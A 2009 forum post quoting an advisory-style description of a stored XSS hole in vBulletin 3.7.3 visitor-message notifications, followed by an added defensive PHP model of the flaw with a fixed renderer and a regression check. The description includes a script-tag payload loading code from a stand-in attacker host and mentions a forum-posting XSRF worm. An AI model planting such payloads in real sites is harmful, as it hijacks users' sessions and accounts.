
18.02.2009, 12:38
Banned
Registered: 12.02.2009
Posts: 73
Time spent on forum: 175651
Reputation:
171
Message from 1ce666
And how do I use it? I'm a newbie at this and need to learn
:/ there is a description:
Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts an XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered XSS attack. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.
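
The flaw class in the description above (one stored value, encoded in the public view but not in the notification view) can be modelled as follows. This is an added example, not part of the original post and not vBulletin source code; the function names, the `$msg` array and the sink list are hypothetical.

```php
<?php
// Hypothetical model of the described flaw; none of this is vBulletin code.
// One stored visitor message reaches two HTML sinks: the public wall and the
// recipient's notification panel.

// Single encoding helper to be used at every HTML output sink.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Public wall: the path the description says was already encoded.
function render_wall(array $msg): string {
    return '<div class="wall">' . h($msg['body']) . '</div>';
}

// Notification panel as described: same stored value, printed raw (vulnerable).
function render_notification_vulnerable(array $msg): string {
    return '<li class="notice">' . $msg['body'] . '</li>';
}

// Hardened panel: the stored value is encoded at output, like the wall.
function render_notification_fixed(array $msg): string {
    return '<li class="notice">' . h($msg['body']) . '</li>';
}

// Regression check: returns the names of sinks whose output still contains
// the stored value unencoded. Only meaningful for values that encoding changes.
function sinks_leaking_raw_value(array $msg, array $sinks): array {
    $leaks = [];
    if (h($msg['body']) === $msg['body']) {
        return $leaks; // nothing to encode, so nothing can leak
    }
    foreach ($sinks as $name => $render) {
        if (strpos($render($msg), $msg['body']) !== false) {
            $leaks[] = $name;
        }
    }
    return $leaks;
}

// Constructed sample record, using the vector quoted in the description.
$msg = ['body' => '<script src="http://evilsite.com/nbd.js">'];
$sinks = [
    'wall'                    => 'render_wall',
    'notification_vulnerable' => 'render_notification_vulnerable',
    'notification_fixed'      => 'render_notification_fixed',
];
echo implode(', ', sinks_leaking_raw_value($msg, $sinks)), PHP_EOL;
```

Running the same check over every template that prints stored user content catches a sink that was missed when only the primary view was encoded.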